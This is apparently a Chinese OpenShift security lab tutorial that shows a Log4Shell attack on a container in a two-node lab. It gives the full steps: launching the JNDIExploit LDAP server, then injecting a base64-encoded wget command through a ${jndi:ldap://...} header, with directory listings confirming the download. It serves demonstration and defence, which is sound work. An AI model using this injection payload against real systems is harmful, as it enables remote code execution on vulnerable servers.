《OpenShift 4.x HOL教程汇总》

演示视频

利用 Log4j 漏洞攻击容器需要有2个条件,1)Java应用中包含受到漏洞影响的Log4j。2)带有“JNDI 注入”的运行环境。

以下在 2 个节点上进行验证:

  1. 在 172.17.0.30 上执行以下命令,运行带有 “JNDI 注入” 的环境。
$ curl -OL https://github.com/giterlizzi/JNDIExploit/releases/download/v1.2/JNDIExploit.zip
$ unzip JNDIExploit.zip
$ java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 172.17.0.30 -p 8888
  1. 在 172.17.0.29 上执行命令。先启动受到 Log4j 漏洞影响的容器,并确认“/tmp”目录下的文件。然后将入驻命令进行 base64 编码,再利用 JNDI 服务注入命令并执行。最后可以确认,受到Log4j漏洞影响的容器内部中已经有被下载的测试文件。
$ docker run --name vulnerable-app -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app
$ docker exec vulnerable-app ls -al /tmp
total 35100
drwxrwxrwt    1 root     root          4096 Dec 24 14:28 .
drwxr-xr-x    1 root     root          4096 Dec 24 14:24 ..
drwxr-xr-x    2 root     root          4096 Dec 24 14:24 hsperfdata_root
drwx------    2 root     root          4096 Dec 24 14:24 tomcat-docbase.8080.1524040148610409673
drwx------    3 root     root          4096 Dec 24 14:24 tomcat.8080.4589198206320996711
$ echo 'wget https://github.com/giterlizzi/JNDIExploit/releases/download/v1.2/JNDIExploit.zip -P /tmp' | base64
$ curl 172.17.0.29:8080 -H 'X-Api-Version: ${jndi:ldap://172.17.0.30:1389/Basic/Command/Base64/d2dldCBodHRwczovL2dpdGh1Yi5jb20vZ2l0ZXJsaXp6aS9KTkRJRXhwbG9pdC9yZWxlYXNlcy9kb3d$ ubG9hZC92MS4yL0pORElFeHBsb2l0LnppcCAtUCAvdG1wCg==}'
$ docker exec vulnerable-app ls -al /tmp
total 35100
drwxrwxrwt    1 root     root          4096 Dec 24 14:28 .
drwxr-xr-x    1 root     root          4096 Dec 24 14:24 ..
-rw-r--r--    1 root     root      35919493 Dec 24 14:28 JNDIExploit.zip
drwxr-xr-x    2 root     root          4096 Dec 24 14:24 hsperfdata_root
drwx------    2 root     root          4096 Dec 24 14:24 tomcat-docbase.8080.1524040148610409673
drwx------    3 root     root          4096 Dec 24 14:24 tomcat.8080.4589198206320996711

OpenShift Security (13) - 利用Log4j漏洞攻击容器相关推荐

  1. 使用电磁辐射可获取恶意软件信息、微软称Log4j漏洞攻击水平仍然很高|1月5日全球网络安全热点

    安全资讯报告 使用电磁辐射可获取恶意软件信息 研究人员开发了一种独特的策略,该策略使用来自物联网(IoT)设备的电磁场发射作为旁路,以获取有关针对嵌入式系统的多种类型恶意软件的准确信息,即使使用混淆策 ...

  2. 如何强化应用安全能力,全面拦截 Log4j 漏洞攻击

    最近几天对于很多开发者而言,只能用争分夺秒与胆战心惊来形容.而造成这一切的源头,来自于被公布的 Apache Log4j2 远程代码执行漏洞(CNVD-2021-95914).当前几乎所有技术巨头都在 ...

  3. 浅谈境外黑客组织利用SonarQube漏洞攻击事件

    随着软件产业的快速发展,现代软件大多数是被"组装"出来的,不是被"开发"出来的.各类信息系统的软件供应链也越发复杂多元,复杂的软件供应链会引入一系列的安全问题, ...

  4. Mirai 新变体利用严重漏洞攻击网络安全设备

     聚焦源代码安全,网罗国内外最新资讯! 编译:奇安信代码卫士团队 一款新型僵尸网络的作者正在攻击受严重漏洞影响的联网设备,其中一些漏洞还影响网络安全设备. 这些攻击仍然在进行,而且使用的是公开披露的 ...

  5. 快速复现利用Log4j漏洞启动windows计算器

    了解关于漏洞的描述,可以参考Vulnerability Affecting Multiple Log4j Versions Permits RCE Exploit 根据文章描述,首先下载JDK1.8u ...

  6. 如何利用计算机漏洞,担心电脑被人利用“CPU漏洞”攻击?这里有一份简单的指南...

    IT之家1月5日消息,近日Intel被曝出此前20年内的CPU都存在漏洞,可以被漏洞攻击者利用来窃取数据,对此全世界的PC用户都变得不淡定起来了,因为现在几乎搭载Intel CPU的设备都在这个范围之 ...

  7. 网安大事件丨Fortinet对Apache Log4j漏洞利用的全面复盘与防御

    起底Apache Log4j漏洞: 如何出现.如何被利用与如何防御 受影响平台: 任何使用Log4j2漏洞版本的应用程序和服务 受影响用户: 任何使用Log4j的具备该漏洞版本的组织 影响: 远程攻击 ...

  8. 深入解析著名的阿里云Log4j 漏洞

    几乎每个系统都会使用日志框架,用于记录日志信息,这些信息可以提供程序运行的上下文,但是日志过多也会影响系统的性能,所以好的日志框架应该是可靠,快速和可扩展的. Apache Log4j2 是一个基于 ...

  9. 美国政府:伊朗黑客利用Log4Shell 漏洞攻陷联邦机构

     聚焦源代码安全,网罗国内外最新资讯! 编译:代码卫士 美国FBI和CISA发布联合公告指出,未具名伊朗威胁组织入侵了联邦民事行政部门 (FCEB) 所属一家组织机构并部署了XMRig 挖矿恶意软件. ...

最新文章

  1. 一个请求方法是一个线程吗?不是!
  2. Spring.Net+NHibenate+Asp.Net mvc +ExtJs 系列 3 ----数据访问层
  3. java 自定义文件后缀名_Java 的源代码文件的扩展名是( )。_学小易找答案
  4. 【AI视野·今日NLP 自然语言处理论文速览 第二十期】Thu, 8 Jul 2021
  5. 不均匀正负样本分布下的机器学习
  6. 以太坊PHP离线交易签名生成,以太坊web3.sendRawTransaction离线签名交易
  7. Openstack概论
  8. windows系统 ping Telnet等系统自带命令无法使用原因及解决方法
  9. Unity中使用GameObject.Find、Transform.Find查找GameObject
  10. python时间和周期_python实现以立春为起点n为周期任意日期所在的日期区间
  11. C语言:void的用法即解析
  12. 纪念2019年高教社杯全国大学生数学建模竞赛
  13. 前端程序员如何快速转型全栈工程师(基础版)
  14. 关于阅读书籍的一点点感悟
  15. Deep Learning ---Ian Goodfellow
  16. 千分位分隔数字并自定义保留小数位数
  17. c语言中能否将打开多个文件的行为放入循环中
  18. 航模无刷电机常见参数
  19. kodbox 可道云上传大文件(超过4G的)
  20. Micropython ESP32驱动CH455控制4位数码管

热门文章

  1. android 抓取webview中的所有图片_Python|任意网页中的所有图片下载
  2. python读取doc文件 语义识别_我可以让socket.makefile具有与常规文件相同的读取语义吗?...
  3. 适合海报设计的最佳字体
  4. 促销惊喜活动优惠海报设计,可临摹PSD分层格式
  5. 实用UI素材|UI中的按钮设计
  6. 设计干货素材|使用纹理背景的技巧
  7. Python爬虫项目--批量下载联合国粮食数据
  8. Redis 的 Sentinel哨兵介绍与源码分析(1):初始化部分
  9. CentOS7安装VirtualBox
  10. Memory Management Concepts overview(内存管理基本概念)